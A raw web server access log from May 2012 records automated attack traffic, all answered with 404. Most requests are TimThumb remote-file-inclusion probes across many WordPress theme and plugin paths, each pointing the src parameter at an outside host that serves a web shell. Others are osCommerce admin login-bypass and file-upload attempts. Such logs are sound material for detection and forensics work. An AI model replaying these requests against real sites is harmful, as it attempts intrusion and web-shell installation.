184.173.6.208 - - [14/May/2012:03:42:39 +0200] "GET //wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
123.194.208.79 - - [14/May/2012:03:42:41 +0200] "GET /admin/categories.php/login.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
123.194.208.79 - - [14/May/2012:03:42:41 +0200] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
123.194.208.79 - - [14/May/2012:03:42:41 +0200] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
192.162.102.215 - - [14/May/2012:03:42:16 +0200] "POST /stats/log.keys.html/admin/banner_manager.php/login.php?action=insert HTTP/1.1" 404 336 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.162.102.215 - - [14/May/2012:03:42:48 +0200] "GET /stats/log.keys.html/images/id_71237.php HTTP/1.1" 404 321 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.88.226.250 - - [14/May/2012:03:42:49 +0200] "GET /stats//wp-content/themes/comfy/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
84.88.226.250 - - [14/May/2012:03:42:49 +0200] "GET //wp-content/themes/comfy/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:03:42:57 +0200] "GET /stats//wp-content/plugins/auto-attachments/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:03:42:58 +0200] "GET //wp-content/plugins/auto-attachments/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
192.162.102.215 - - [14/May/2012:03:42:52 +0200] "POST /stats/log.keys.html/admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 404 334 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
184.173.6.208 - - [14/May/2012:03:43:19 +0200] "GET /stats//wp-content/plugins/auto-attachments/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:03:43:20 +0200] "GET //wp-content/plugins/auto-attachments/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.88.226.250 - - [14/May/2012:03:43:30 +0200] "GET /stats//wp-content/themes/comfy/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
84.88.226.250 - - [14/May/2012:03:43:31 +0200] "GET //wp-content/themes/comfy/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:03:43:34 +0200] "GET /stats//wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:03:43:40 +0200] "GET //wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
192.162.102.215 - - [14/May/2012:03:43:23 +0200] "POST /stats/log.keys.html/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 332 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.162.102.215 - - [14/May/2012:03:43:45 +0200] "POST /stats/log.keys.html/admin/banner_manager.php/login.php?action=insert HTTP/1.1" 404 336 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.162.102.215 - - [14/May/2012:03:44:06 +0200] "GET /stats/log.keys.html/images/id_71237.php HTTP/1.1" 404 321 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
64.9.215.134 - - [14/May/2012:03:44:09 +0200] "GET /stats//wp-content/themes/multidesign/js/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
202.167.218.201 - - [14/May/2012:03:44:09 +0200] "GET /admin/categories.php/login.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
202.167.218.201 - - [14/May/2012:03:44:10 +0200] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
64.9.215.134 - - [14/May/2012:03:44:12 +0200] "GET /stats//wp-content/themes/multidesign/js/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.9.215.134 - - [14/May/2012:03:44:15 +0200] "GET //wp-content/themes/multidesign/js/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
202.167.218.201 - - [14/May/2012:03:44:15 +0200] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.118.24.103 - - [14/May/2012:03:44:17 +0200] "GET /stats//wp-content/themes/Memoir/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 314 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
64.59.71.157 - - [14/May/2012:03:44:17 +0200] "GET //wp-content/themes/coda//timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/coda/includes/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/coda/functions/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/coda/options/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/coda/scripts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.9.215.134 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/multidesign/js/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
64.59.71.157 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/coda/modules/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.118.24.103 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/Memoir/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 308 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
64.59.71.157 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/coda/tools/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/coda/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:18 +0200] "GET //wp-content/themes/coda/js/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:19 +0200] "GET //wp-content/themes/coda/lib/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:19 +0200] "GET //wp-content/themes/coda/library/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:19 +0200] "GET //wp-content/themes/coda/tools/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:19 +0200] "GET //wp-content/themes/coda/tools/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:19 +0200] "GET //wp-content/themes/coda/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:19 +0200] "GET //wp-content/themes/coda/scripts/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:19 +0200] "GET //wp-content/themes/coda/scripts/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:22 +0200] "GET //wp-content/themes/coda/library/functions/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:22 +0200] "GET //wp-content/themes/coda/library/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:23 +0200] "GET //wp-content/themes/coda/library/resource/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:23 +0200] "GET //wp-content/themes/coda/library/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:23 +0200] "GET //wp-content/themes/coda/lib/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:23 +0200] "GET //wp-content/themes/coda/lib/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:23 +0200] "GET //wp-content/themes/coda/lib/script/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:23 +0200] "GET //wp-content/themes/coda/lib/custom/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:23 +0200] "GET //wp-content/themes/coda/layouts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:23 +0200] "GET //wp-content/themes/coda/includes/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:24 +0200] "GET //wp-content/themes/coda/custom/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:24 +0200] "GET //wp-content/themes/coda/framework/includes/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:24 +0200] "GET //wp-content/themes/coda/framework/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:24 +0200] "GET //wp-content/themes/coda/functions/scripts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:24 +0200] "GET //wp-content/themes/coda/functions/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:24 +0200] "GET //wp-content/themes/coda/images/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:24 +0200] "GET //wp-content/themes/coda/inc/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:24 +0200] "GET //wp-content/themes/coda/includes/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:24 +0200] "GET //wp-content/themes/coda//thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:25 +0200] "GET //wp-content/themes/coda/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:25 +0200] "GET //wp-content/themes/coda/functions/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:25 +0200] "GET //wp-content/themes/coda/options/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:25 +0200] "GET //wp-content/themes/coda/scripts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:25 +0200] "GET //wp-content/themes/coda/modules/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:25 +0200] "GET //wp-content/themes/coda/tools/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:25 +0200] "GET //wp-content/themes/coda/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:25 +0200] "GET //wp-content/themes/coda/js/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:26 +0200] "GET //wp-content/themes/coda/lib/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
184.173.6.208 - - [14/May/2012:03:44:26 +0200] "GET /stats//wp-content/plugins/auto-attachments/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
64.59.71.157 - - [14/May/2012:03:44:26 +0200] "GET //wp-content/themes/coda/library/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:26 +0200] "GET //wp-content/themes/coda/tools/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:26 +0200] "GET //wp-content/themes/coda/tools/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:26 +0200] "GET //wp-content/themes/coda/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:26 +0200] "GET //wp-content/themes/coda/scripts/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:26 +0200] "GET //wp-content/themes/coda/scripts/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:26 +0200] "GET //wp-content/themes/coda/library/functions/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:26 +0200] "GET //wp-content/themes/coda/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/themes/coda/library/resource/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/themes/coda/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
184.173.6.208 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/plugins/auto-attachments/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
64.59.71.157 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/themes/coda/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/themes/coda/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/themes/coda/lib/script/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/themes/coda/lib/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/themes/coda/layouts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/themes/coda/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:27 +0200] "GET //wp-content/themes/coda/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:28 +0200] "GET //wp-content/themes/coda/framework/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.59.71.157 - - [14/May/2012:03:44:28 +0200] "GET //wp-content/themes/coda/framework/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
